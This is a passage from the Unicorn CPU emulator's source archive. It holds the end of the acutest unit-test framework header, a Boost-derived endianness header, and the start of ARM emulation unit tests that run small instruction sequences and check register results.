{'v', "verbose", 'v', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, {'q', "quiet", 'q', 0}, {0, "color", 'c', ACUTEST_CMDLINE_OPTFLAG_OPTIONALARG_}, {0, "no-color", 'C', 0}, {'h', "help", 'h', 0}, {0, "worker", 'w', ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_}, /* internal */ {'x', "xml-output", 'x', ACUTEST_CMDLINE_OPTFLAG_REQUIREDARG_}, {0, NULL, 0, 0}}; static int acutest_cmdline_callback_(int id, const char *arg) { switch (id) { case 's': acutest_skip_mode_ = 1; break; case 'e': if (arg == NULL || strcmp(arg, "always") == 0) { acutest_no_exec_ = 0; } else if (strcmp(arg, "never") == 0) { acutest_no_exec_ = 1; } else if (strcmp(arg, "auto") == 0) { /*noop*/ } else { fprintf(stderr, "%s: Unrecognized argument '%s' for option --exec.\n", acutest_argv0_, arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); } break; case 'E': acutest_no_exec_ = 1; break; case 't': #if defined ACUTEST_WIN_ || defined ACUTEST_HAS_POSIX_TIMER_ if (arg == NULL || strcmp(arg, "real") == 0) { acutest_timer_ = 1; #ifndef ACUTEST_WIN_ } else if (strcmp(arg, "cpu") == 0) { acutest_timer_ = 2; #endif } else { fprintf(stderr, "%s: Unrecognized argument '%s' for option --time.\n", acutest_argv0_, arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); } #endif break; case 'S': acutest_no_summary_ = 1; break; case 'T': acutest_tap_ = 1; break; case 'l': acutest_list_names_(); acutest_exit_(0); break; case 'v': acutest_verbose_level_ = (arg != NULL ? atoi(arg) : acutest_verbose_level_ + 1); break; case 'q': acutest_verbose_level_ = 0; break; case 'c': if (arg == NULL || strcmp(arg, "always") == 0) { acutest_colorize_ = 1; } else if (strcmp(arg, "never") == 0) { acutest_colorize_ = 0; } else if (strcmp(arg, "auto") == 0) { /*noop*/ } else { fprintf(stderr, "%s: Unrecognized argument '%s' for option --color.\n", acutest_argv0_, arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); } break; case 'C': acutest_colorize_ = 0; break; case 'h': acutest_help_(); acutest_exit_(0); break; case 'w': acutest_worker_ = 1; acutest_worker_index_ = atoi(arg); break; case 'x': acutest_xml_output_ = fopen(arg, "w"); if (!acutest_xml_output_) { fprintf(stderr, "Unable to open '%s': %s\n", arg, strerror(errno)); acutest_exit_(2); } break; case 0: if (acutest_lookup_(arg) == 0) { fprintf(stderr, "%s: Unrecognized unit test '%s'\n", acutest_argv0_, arg); fprintf(stderr, "Try '%s --list' for list of unit tests.\n", acutest_argv0_); acutest_exit_(2); } break; case ACUTEST_CMDLINE_OPTID_UNKNOWN_: fprintf(stderr, "Unrecognized command line option '%s'.\n", arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); break; case ACUTEST_CMDLINE_OPTID_MISSINGARG_: fprintf(stderr, "The command line option '%s' requires an argument.\n", arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); break; case ACUTEST_CMDLINE_OPTID_BOGUSARG_: fprintf(stderr, "The command line option '%s' does not expect an argument.\n", arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); break; } return 0; } #ifdef ACUTEST_LINUX_ static int acutest_is_tracer_present_(void) { /* Must be large enough so the line 'TracerPid: ${PID}' can fit in. */ static const int OVERLAP = 32; char buf[256 + OVERLAP + 1]; int tracer_present = 0; int fd; size_t n_read = 0; fd = open("/proc/self/status", O_RDONLY); if (fd == -1) return 0; while (1) { static const char pattern[] = "TracerPid:"; const char *field; while (n_read < sizeof(buf) - 1) { ssize_t n; n = read(fd, buf + n_read, sizeof(buf) - 1 - n_read); if (n <= 0) break; n_read += n; } buf[n_read] = '\0'; field = strstr(buf, pattern); if (field != NULL && field < buf + sizeof(buf) - OVERLAP) { pid_t tracer_pid = (pid_t)atoi(field + sizeof(pattern) - 1); tracer_present = (tracer_pid != 0); break; } if (n_read == sizeof(buf) - 1) { memmove(buf, buf + sizeof(buf) - 1 - OVERLAP, OVERLAP); n_read = OVERLAP; } else { break; } } close(fd); return tracer_present; } #endif #ifdef ACUTEST_MACOS_ static bool acutest_AmIBeingDebugged(void) { int junk; int mib[4]; struct kinfo_proc info; size_t size; // Initialize the flags so that, if sysctl fails for some bizarre // reason, we get a predictable result. info.kp_proc.p_flag = 0; // Initialize mib, which tells sysctl the info we want, in this case // we're looking for information about a specific process ID. mib[0] = CTL_KERN; mib[1] = KERN_PROC; mib[2] = KERN_PROC_PID; mib[3] = getpid(); // Call sysctl. size = sizeof(info); junk = sysctl(mib, sizeof(mib) / sizeof(*mib), &info, &size, NULL, 0); assert(junk == 0); // We're being debugged if the P_TRACED flag is set. return ((info.kp_proc.p_flag & P_TRACED) != 0); } #endif int main(int argc, char **argv) { int i; acutest_argv0_ = argv[0]; #if defined ACUTEST_UNIX_ acutest_colorize_ = isatty(STDOUT_FILENO); #elif defined ACUTEST_WIN_ #if defined _BORLANDC_ acutest_colorize_ = isatty(_fileno(stdout)); #else acutest_colorize_ = _isatty(_fileno(stdout)); #endif #else acutest_colorize_ = 0; #endif /* Count all test units */ acutest_list_size_ = 0; for (i = 0; acutest_list_[i].func != NULL; i++) acutest_list_size_++; acutest_test_data_ = (struct acutest_test_data_ *)calloc( acutest_list_size_, sizeof(struct acutest_test_data_)); if (acutest_test_data_ == NULL) { fprintf(stderr, "Out of memory.\n"); acutest_exit_(2); } /* Parse options */ acutest_cmdline_read_(acutest_cmdline_options_, argc, argv, acutest_cmdline_callback_); /* Initialize the proper timer. */ acutest_timer_init_(); #if defined(ACUTEST_WIN_) SetUnhandledExceptionFilter(acutest_seh_exception_filter_); #ifdef _MSC_VER _set_abort_behavior(0, _WRITE_ABORT_MSG); #endif #endif /* By default, we want to run all tests. */ if (acutest_count_ == 0) { for (i = 0; acutest_list_[i].func != NULL; i++) acutest_remember_(i); } /* Guess whether we want to run unit tests as child processes. */ if (acutest_no_exec_ < 0) { acutest_no_exec_ = 0; if (acutest_count_ <= 1) { acutest_no_exec_ = 1; } else { #ifdef ACUTEST_WIN_ if (IsDebuggerPresent()) acutest_no_exec_ = 1; #endif #ifdef ACUTEST_LINUX_ if (acutest_is_tracer_present_()) acutest_no_exec_ = 1; #endif #ifdef ACUTEST_MACOS_ if (acutest_AmIBeingDebugged()) acutest_no_exec_ = 1; #endif #ifdef RUNNING_ON_VALGRIND /* RUNNING_ON_VALGRIND is provided by optionally included * <valgrind.h> */ if (RUNNING_ON_VALGRIND) acutest_no_exec_ = 1; #endif } } if (acutest_tap_) { /* TAP requires we know test result ("ok", "not ok") before we output * anything about the test, and this gets problematic for larger verbose * levels. */ if (acutest_verbose_level_ > 2) acutest_verbose_level_ = 2; /* TAP harness should provide some summary. */ acutest_no_summary_ = 1; if (!acutest_worker_) printf("1..%d\n", (int)acutest_count_); } int index = acutest_worker_index_; for (i = 0; acutest_list_[i].func != NULL; i++) { int run = (acutest_test_data_[i].flags & ACUTEST_FLAG_RUN_); if (acutest_skip_mode_) /* Run all tests except those listed. */ run = !run; if (run) acutest_run_(´st_list_[i], index++, i); } /* Write a summary */ if (!acutest_no_summary_ && acutest_verbose_level_ >= 1) { if (acutest_verbose_level_ >= 3) { acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Summary:\n"); printf(" Count of all unit tests: %4d\n", (int)acutest_list_size_); printf(" Count of run unit tests: %4d\n", acutest_stat_run_units_); printf(" Count of failed unit tests: %4d\n", acutest_stat_failed_units_); printf(" Count of skipped unit tests: %4d\n", (int)acutest_list_size_ - acutest_stat_run_units_); } if (acutest_stat_failed_units_ == 0) { acutest_colored_printf_(ACUTEST_COLOR_GREEN_INTENSIVE_, "SUCCESS:"); printf(" All unit tests have passed.\n"); } else { acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "FAILED:"); printf(" %d of %d unit tests %s failed.\n", acutest_stat_failed_units_, acutest_stat_run_units_, (acutest_stat_failed_units_ == 1) ? "has" : "have"); } if (acutest_verbose_level_ >= 3) printf("\n"); } if (acutest_xml_output_) { #if defined ACUTEST_UNIX_ char *suite_name = basename(argv[0]); #elif defined ACUTEST_WIN_ char suite_name[_MAX_FNAME]; _splitpath(argv[0], NULL, NULL, suite_name, NULL); #else const char *suite_name = argv[0]; #endif fprintf(acutest_xml_output_, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"); fprintf(acutest_xml_output_, "<testsuite name=\"%s\" tests=\"%d\" errors=\"%d\" " "failures=\"%d\" skip=\"%d\">\n", suite_name, (int)acutest_list_size_, acutest_stat_failed_units_, acutest_stat_failed_units_, (int)acutest_list_size_ - acutest_stat_run_units_); for (i = 0; acutest_list_[i].func != NULL; i++) { struct acutest_test_data_ *details = ´st_test_data_[i]; fprintf(acutest_xml_output_, " <testcase name=\"%s\" time=\"%.2f\">\n", acutest_list_[i].name, details->duration); if (details->flags & ACUTEST_FLAG_FAILURE_) fprintf(acutest_xml_output_, " <failure />\n"); if (!(details->flags & ACUTEST_FLAG_FAILURE_) && !(details->flags & ACUTEST_FLAG_SUCCESS_)) fprintf(acutest_xml_output_, " <skipped />\n"); fprintf(acutest_xml_output_, " </testcase>\n"); } fprintf(acutest_xml_output_, "</testsuite>\n"); fclose(acutest_xml_output_); } acutest_cleanup_(); return (acutest_stat_failed_units_ == 0) ? 0 : 1; } #endif /* #ifndef TEST_NO_MAIN */ #ifdef _MSC_VER #pragma warning(pop) #endif #ifdef __cplusplus } /* extern "C" */ #endif #endif /* #ifndef ACUTEST_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/endian.h�������������������������������������������������������������������0000664�0000000�0000000�00000005470�14675241067�0016742�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// Copy fron boost 1.43.0 // Copyright 2005 Caleb Epstein // Copyright 2006 John Maddock // Distributed under the Boost Software License, Version 1.0. (See accompany- // ing file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) /* * Copyright (c) 1997 * Silicon Graphics Computer Systems, Inc. * * Permission to use, copy, modify, distribute and sell this software * and its documentation for any purpose is hereby granted without fee, * provided that the above copyright notice appear in all copies and * that both that copyright notice and this permission notice appear * in supporting documentation. Silicon Graphics makes no * representations about the suitability of this software for any * purpose. It is provided "as is" without express or implied warranty. */ /* * Copyright notice reproduced from <boost/detail/limits.hpp>, from * which this code was originally taken. * * Modified by Caleb Epstein to use <endian.h> with GNU libc and to * defined the BOOST_ENDIAN macro. */ #ifndef BOOST_DETAIL_ENDIAN_HPP #define BOOST_DETAIL_ENDIAN_HPP // GNU libc offers the helpful header <endian.h> which defines // __BYTE_ORDER #if defined(__GLIBC__) #include <endian.h> #if (__BYTE_ORDER == __LITTLE_ENDIAN) #define BOOST_LITTLE_ENDIAN #elif (__BYTE_ORDER == __BIG_ENDIAN) #define BOOST_BIG_ENDIAN #elif (__BYTE_ORDER == __PDP_ENDIAN) #define BOOST_PDP_ENDIAN #else // Failsafe #define BOOST_LITTLE_ENDIAN #endif #define BOOST_BYTE_ORDER __BYTE_ORDER #elif defined(_BIG_ENDIAN) && !defined(_LITTLE_ENDIAN) #define BOOST_BIG_ENDIAN #define BOOST_BYTE_ORDER 4321 #elif defined(_LITTLE_ENDIAN) && !defined(_BIG_ENDIAN) #define BOOST_LITTLE_ENDIAN #define BOOST_BYTE_ORDER 1234 // https://developer.arm.com/documentation/dui0491/i/Compiler-specific-Features/Predefined-macros #elif defined(__sparc) || defined(__sparc__) || defined(_POWER) || \ defined(__powerpc__) || defined(__ppc__) || defined(__hpux) || \ defined(__hppa) || defined(_MIPSEB) || defined(_POWER) || \ defined(__s390__) || defined(__ARMEB__) || defined(__AARCH64EB__) || \ defined(__BIG_ENDIAN) || defined(__ARM_BIG_ENDIAN) #define BOOST_BIG_ENDIAN #define BOOST_BYTE_ORDER 4321 #elif defined(__i386__) || defined(__alpha__) || defined(__ia64) || \ defined(__ia64__) || defined(_M_IX86) || defined(_M_IA64) || \ defined(_M_ALPHA) || defined(__amd64) || defined(__amd64__) || \ defined(_M_AMD64) || defined(__x86_64) || defined(__x86_64__) || \ defined(_M_X64) || defined(__bfin__) || defined(__ARMEL__) || \ defined(__AARCH64EL__) || defined(__arm64__) || defined(__arm__) #define BOOST_LITTLE_ENDIAN #define BOOST_BYTE_ORDER 1234 #else // Failsafe #define BOOST_LITTLE_ENDIAN #define BOOST_BYTE_ORDER 1234 #endif #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_arm.c�����������������������������������������������������������������0000664�0000000�0000000�00000061703�14675241067�0017316�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size, uc_cpu_arm cpu) { OK(uc_open(arch, mode, uc)); OK(uc_ctl_set_cpu_model(*uc, cpu)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_arm_nop(void) { uc_engine *uc; char code[] = "\x00\xf0\x20\xe3"; // nop int r_r0 = 0x1234; int r_r2 = 0x6789; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); TEST_CHECK(r_r0 == 0x1234); TEST_CHECK(r_r2 == 0x6789); OK(uc_close(uc)); } static void test_arm_thumb_sub(void) { uc_engine *uc; char code[] = "\x83\xb0"; // sub sp, #0xc int r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); TEST_CHECK(r_sp == 0x1228); OK(uc_close(uc)); } static void test_armeb_sub(void) { uc_engine *uc; char code[] = "\xe3\xa0\x00\x37\xe0\x42\x10\x03"; // mov r0, #0x37; sub r1, r2, r3 int r_r0 = 0x1234; int r_r2 = 0x6789; int r_r3 = 0x3333; int r_r1; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1, UC_CPU_ARM_1176); OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r_r1)); OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_read(uc, UC_ARM_REG_R3, &r_r3)); TEST_CHECK(r_r0 == 0x37); TEST_CHECK(r_r2 == 0x6789); TEST_CHECK(r_r3 == 0x3333); TEST_CHECK(r_r1 == 0x3456); OK(uc_close(uc)); } static void test_armeb_be8_sub(void) { uc_engine *uc; char code[] = "\x37\x00\xa0\xe3\x03\x10\x42\xe0"; // mov r0, #0x37; sub r1, r2, r3 int r_r0 = 0x1234; int r_r2 = 0x6789; int r_r3 = 0x3333; int r_r1; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_ARMBE8, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r_r1)); OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_read(uc, UC_ARM_REG_R3, &r_r3)); TEST_CHECK(r_r0 == 0x37); TEST_CHECK(r_r2 == 0x6789); TEST_CHECK(r_r3 == 0x3333); TEST_CHECK(r_r1 == 0x3456); OK(uc_close(uc)); } static void test_arm_thumbeb_sub(void) { uc_engine *uc; char code[] = "\xb0\x83"; // sub sp, #0xc int r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1, UC_CPU_ARM_1176); OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); TEST_CHECK(r_sp == 0x1228); OK(uc_close(uc)); } static void test_arm_thumb_ite_count_callback(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { uint64_t *count = (uint64_t *)user_data; (*count) += 1; } static void test_arm_thumb_ite(void) { uc_engine *uc; uc_hook hook; char code[] = "\x9a\x42\x15\xbf\x00\x9a\x01\x9a\x78\x23\x15\x23"; // cmp r2, r3; itete // ne; ldrne r2, // [sp]; ldreq r2, // [sp,#4]; movne // r3, #0x78; moveq // r3, #0x15 int r_sp = 0x8000; int r_r2 = 0; int r_r3 = 1; int r_pc = 0; uint64_t count = 0; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); OK(uc_mem_map(uc, r_sp, 0x1000, UC_PROT_ALL)); r_r2 = LEINT32(0x68); OK(uc_mem_write(uc, r_sp, &r_r2, 4)); r_r2 = LEINT32(0x4d); OK(uc_mem_write(uc, r_sp + 4, &r_r2, 4)); OK(uc_hook_add(uc, &hook, UC_HOOK_CODE, test_arm_thumb_ite_count_callback, &count, 1, 0)); // Execute four instructions at a time. OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_read(uc, UC_ARM_REG_R3, &r_r3)); TEST_CHECK(r_r2 == 0x68); TEST_CHECK(count == 4); r_pc = code_start; r_r2 = 0; count = 0; OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); for (int i = 0; i < 6 && r_pc < code_start + sizeof(code) - 1; i++) { // Execute one instruction at a time. OK(uc_emu_start(uc, r_pc | 1, code_start + sizeof(code) - 1, 0, 1)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); } OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); TEST_CHECK(r_r2 == 0x68); TEST_CHECK(r_r3 == 0x78); TEST_CHECK(count == 4); OK(uc_close(uc)); } static void test_arm_m_thumb_mrs(void) { uc_engine *uc; char code[] = "\xef\xf3\x14\x80\xef\xf3\x00\x81"; // mrs r0, control; mrs r1, apsr uint32_t r_control = 0b10; uint32_t r_apsr = (0b10101 << 27); uint32_t r_r0, r_r1; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_MCLASS, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_write(uc, UC_ARM_REG_APSR_NZCVQ, &r_apsr)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r_r1)); TEST_CHECK(r_r0 == 0b10); TEST_CHECK(r_r1 == (0b10101 << 27)); OK(uc_close(uc)); } static void test_arm_m_control(void) { uc_engine *uc; int r_control, r_msp, r_psp; OK(uc_open(UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_MCLASS, &uc)); r_control = 0; // Make sure we are using MSP. OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); r_msp = 0x1000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_msp)); r_control = 0b10; // Make the switch. OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_psp)); TEST_CHECK(r_psp != r_msp); r_psp = 0x2000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_psp)); r_control = 0; // Switch again OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_msp)); TEST_CHECK(r_psp != r_msp); TEST_CHECK(r_msp == 0x1000); OK(uc_close(uc)); } // // Some notes: // Qemu raise a special exception EXCP_EXCEPTION_EXIT to handle the // EXC_RETURN. We can't help user handle EXC_RETURN since unicorn is designed // not to handle any CPU exception. // static void test_arm_m_exc_return_hook_interrupt(uc_engine *uc, int intno, void *data) { int r_pc; OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); TEST_CHECK(intno == 8); // EXCP_EXCEPTION_EXIT: Return from v7M exception. TEST_CHECK((r_pc | 1) == 0xFFFFFFFD); OK(uc_emu_stop(uc)); } static void test_arm_m_exc_return(void) { uc_engine *uc; char code[] = "\x6f\xf0\x02\x00\x00\x47"; // mov r0, #0xFFFFFFFD; bx r0; int r_ipsr; int r_sp = 0x8000; uc_hook hook; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_MCLASS, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_mem_map(uc, r_sp - 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_hook_add(uc, &hook, UC_HOOK_INTR, test_arm_m_exc_return_hook_interrupt, NULL, 0, 0)); r_sp -= 0x1c; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_ipsr = 16; // We are in whatever exception. OK(uc_reg_write(uc, UC_ARM_REG_IPSR, &r_ipsr)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 2)); // Just execute 2 instructions. OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } // For details, see https://github.com/unicorn-engine/unicorn/issues/1494. static void test_arm_und32_to_svc32(void) { uc_engine *uc; // # MVN r0, #0 // # MOVS pc, lr // # MVN r0, #0 // # MVN r0, #0 char code[] = "\x00\x00\xe0\xe3\x0e\xf0\xb0\xe1\x00\x00\xe0\xe3\x00\x00\xe0\xe3"; int r_cpsr, r_sp, r_spsr, r_lr; OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_A9)); OK(uc_mem_map(uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(uc, code_start, code, sizeof(code) - 1)); // https://www.keil.com/pack/doc/CMSIS/Core_A/html/group__CMSIS__CPSR__M.html r_cpsr = 0x40000093; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_sp = 0x12345678; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_cpsr = 0x4000009b; // UND32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_spsr = 0x40000093; // Save previous CPSR OK(uc_reg_write(uc, UC_ARM_REG_SPSR, &r_spsr)); r_sp = 0xDEAD0000; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = code_start + 8; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 3)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); TEST_CHECK(r_sp == 0x12345678); OK(uc_close(uc)); } static void test_arm_usr32_to_svc32(void) { uc_engine *uc; int r_cpsr, r_sp, r_spsr, r_lr; OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_A9)); // https://www.keil.com/pack/doc/CMSIS/Core_A/html/group__CMSIS__CPSR__M.html r_cpsr = 0x40000093; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_sp = 0x12345678; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = 0x00102220; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); r_cpsr = 0x4000009b; // UND32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_spsr = 0x40000093; // Save previous CPSR OK(uc_reg_write(uc, UC_ARM_REG_SPSR, &r_spsr)); r_sp = 0xDEAD0000; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = 0x00509998; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); TEST_CHECK((r_cpsr & ((1 << 4) - 1)) == 0xb); // We are in UND32 r_cpsr = 0x40000090; // USR32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_sp = 0x0010000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_sp)); r_lr = 0x0001234; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); TEST_CHECK((r_cpsr & ((1 << 4) - 1)) == 0); // We are in USR32 r_cpsr = 0x40000093; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); TEST_CHECK((r_cpsr & ((1 << 4) - 1)) == 3); // We are in SVC32 TEST_CHECK(r_sp == 0x12345678); OK(uc_close(uc)); } static void test_arm_v8(void) { char code[] = "\xd0\xe8\xff\x17"; // LDAEXD.W R1, [R0] uc_engine *uc; uint32_t r_r1 = LEINT32(0xdeadbeef); uint32_t r_r0; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_M33); r_r0 = 0x8000; OK(uc_mem_map(uc, r_r0, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, r_r0, (void *)&r_r1, 4)); OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r_r1)); TEST_CHECK(r_r1 == 0xdeadbeef); OK(uc_close(uc)); } static void test_arm_thumb_smlabb(void) { char code[] = "\x13\xfb\x01\x23"; uint32_t r_r1, r_r2, r_r3; uc_engine *uc; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_M7); r_r3 = 5; r_r1 = 7; r_r2 = 9; OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); OK(uc_reg_write(uc, UC_ARM_REG_R1, &r_r1)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R3, &r_r3)); TEST_CHECK(r_r3 == 5 * 7 + 9); OK(uc_close(uc)); } static void test_arm_not_allow_privilege_escalation(void) { uc_engine *uc; int r_cpsr, r_sp, r_spsr, r_lr; // E3C6601F : BIC r6, r6, #&1F // E3866013 : ORR r6, r6, #&13 // E121F006 : MSR cpsr_c, r6 ; switch to SVC32 (should be ineffective // from USR32) // E1A00000 : MOV r0,r0 EF000011 : SWI OS_Exit char code[] = "\x1f\x60\xc6\xe3\x13\x60\x86\xe3\x06\xf0\x21\xe1\x00\x00\xa0" "\xe1\x11\x00\x00\xef"; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); // https://www.keil.com/pack/doc/CMSIS/Core_A/html/group__CMSIS__CPSR.html r_cpsr = 0x40000013; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_spsr = 0x40000013; OK(uc_reg_write(uc, UC_ARM_REG_SPSR, &r_spsr)); r_sp = 0x12345678; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = 0x00102220; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); r_cpsr = 0x40000010; // USR32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); 